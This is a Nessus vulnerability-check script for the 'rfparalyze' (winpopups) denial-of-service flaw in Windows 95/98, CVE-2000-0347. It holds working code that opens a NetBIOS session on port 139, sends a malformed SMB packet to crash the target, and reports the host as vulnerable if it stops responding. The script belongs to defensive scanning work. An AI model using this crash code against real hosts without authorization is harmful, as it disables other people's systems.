#
# (C) Tenable Network Security
#

if(description)
{
 script_id(10392);
 script_bugtraq_id(1163);
 script_cve_id("CVE-2000-0347");
 script_version ("$Revision: 1.17 $");
 name["english"] = "rfparalyze";
 script_name(english:name["english"]);
 
 desc["english"] = "
Synopsis :

The remote application is prone to denial of service attacks. 

Description :

The remote host appears to be running Microsoft Windows 95/98

The version of Windows installed on the remote host is vulnerable
to the 'winpopups' or 'rfparalyze' denial of service.
A user can leverage this issue to crash the remote host. 

Note that Nessus crashed the remote host to test this flaw.

See also :

http://seclists.org/bugtraq/2000/May/0023.html

Solution :

No patch available. Filter incoming traffic to this port.

Risk factor :

High / CVSS Base Score : 7.8 
(CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C)";

 script_description(english:desc["english"]);
 
 summary["english"] = "Crash a host through winpopups";
 script_summary(english:summary["english"]);
 
 script_category(ACT_KILL_HOST);
 
 script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc");
 family["english"] = "Denial of Service";
 script_family(english:family["english"]);
 script_dependencie("netbios_name_get.nasl");
 script_require_keys("SMB/name");
 script_require_ports(139);
 exit(0);
}

include ("smb_func.inc");

name = string(get_kb_item("SMB/name"));
if (!name) exit(0);

port = 139;
if (!get_port_state(port)) exit(0);      

soc = open_sock_tcp(port);
if (!soc) exit(0);

session_init(socket:soc, hostname:name);

called_name = netbios_encode(data:name, service:0x03);
calling_name = netbios_encode(data:"NESSUS", service:0x03);

data = ascii(string:called_name) + ascii(string:calling_name);

rep = netbios_sendrecv (type:0x81, data:data);
if (!rep || ord(rep[0]) != 0x82)
  exit(0);


header = smb_header (Command: 0xd0, Status: nt_status (Status: STATUS_SUCCESS));
parameters = smb_parameters (data:NULL);
data = smb_data (data:NULL);

packet = netbios_packet (header:header, parameters:parameters, data:data);

ret = smb_sendrecv (data:packet);
close(soc);

soc = open_sock_tcp(port);
if(!soc)
{
 security_hole(port); 
 set_kb_item(name:"Host/dead", value:TRUE);
 exit(0);
}	
 
